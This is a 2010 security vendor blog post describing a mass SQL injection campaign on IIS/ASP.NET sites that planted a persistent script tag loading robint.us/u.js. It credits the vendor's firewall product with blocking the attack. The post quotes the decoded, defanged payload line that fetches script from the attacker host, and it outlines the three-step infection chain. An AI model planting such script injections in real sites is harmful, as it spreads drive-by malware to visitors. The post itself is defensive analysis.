June 15, 2010

Latest ROBINT.US/U.JS infects 114000 victims: Analyzed and Mitigated

Earlier last week, as reported by the SUCURI blog - the web was hit with an interesting Malware Injection originating in a “robint.us/u.js” deadly script that was injected into various applications. A search shows 114,000 results for infected web pages, which validates the attack as (unfortunately) successful.

The attack addressed specific functions that coexist when an application is hosted by an IIS web server hosting an ASP.NET application.  With today's advanced and automated hacking techniques (Google Dorks, scripting, anonymous proxies and others) any such vulnerability can unfortunately be spread rapidly and effectively over a short period of time, causing major damage.

We decided to take this attack for a trial and attack one of our very own systems (yes, we do that!) and having our SecureSphere product deal with it. The result?  SecureSphere caught this attack vector, rendering it useless, making our WAF customer base safe.

How did it look?  From SecureSphere’s Alert we learn that our default security policies were able to catch on this attack attempt and effectively block it.


  1. The attack begins as an SQL Injection on a parameter over an ASP.NET web page, exploiting a known insecure function in the database.  The encoded payload is then decoded into - <script src=hxxp://ww.robint.us/u.js></script> and kept in the database (and thus is persistent).
  2. A user then surfs to a web page that invokes this script and executes on the client side, which downloads a malware ( see http://www.sophos.com/blogs/sophoslabs/?p=9941 for more detail 
  3. Attacker wins!

Authors & Topics:

Share on LinkedIn


Verify your Comment

Previewing your Comment

This is only a preview. Your comment has not yet been posted.

Your comment could not be posted. Error type:
Your comment has been saved. Comments are moderated and will not appear until approved by the author. Post another comment

The letters and numbers you entered did not match the image. Please try again.

As a final step before posting your comment, enter the letters and numbers you see in the image below. This prevents automated programs from posting comments.

Having trouble reading this image? View an alternate.


Post a comment

Comments are moderated, and will not appear until the author has approved them.